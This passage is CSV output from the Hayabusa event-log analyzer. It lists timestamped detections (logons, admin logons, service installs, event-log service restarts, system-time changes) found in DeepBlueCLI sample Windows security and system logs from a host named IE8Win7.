+00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:30:56.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:31:10.741 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:32:13.000 +00:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:33:10.078 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:33:15.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:33:31.593 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 
0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:45:29.131 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:45:45.037 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:46:48.772 +00:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:48:35.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:50:25.546 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:50:26.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:50:33.551 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:55:52.082 +00:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:02:24.316 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:03:23.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:04:28.750 +00:00,IE8Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:04:53.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:05:04.098 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:05:33.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:06:18.921 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:06:22.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:07:16.729 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:18:24.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:19:46.750 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:19:51.000 +00:00,IE8Win7,6005,info,,Event Log Service 
Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:20:01.879 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:21:52.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:23:04.093 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:23:07.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:23:18.798 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: 
IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:34:54.649 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:35:55.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:36:39.718 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:36:43.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:36:53.245 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: 
IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:42:34.667 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:42:56.213 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:44:06.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:45:58.015 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:45:59.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:46:10.368 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:54:00.258 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:54:08.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:54:58.140 +00:00,IE8Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:00.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:55:06.370 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:49:57.323 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 
0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:52:14.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 20:54:11.078 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:54:22.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 20:54:29.619 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:56:36.649 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:05:37.180 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:06:17.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:07:31.859 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:07:33.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:07:44.487 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:35:27.028 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:50:27.138 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: 
C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.919 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.263 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.263 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.669 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.669 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:54:01.732 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:54:10.000 +00:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:55:25.000 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:29.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:37.450 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
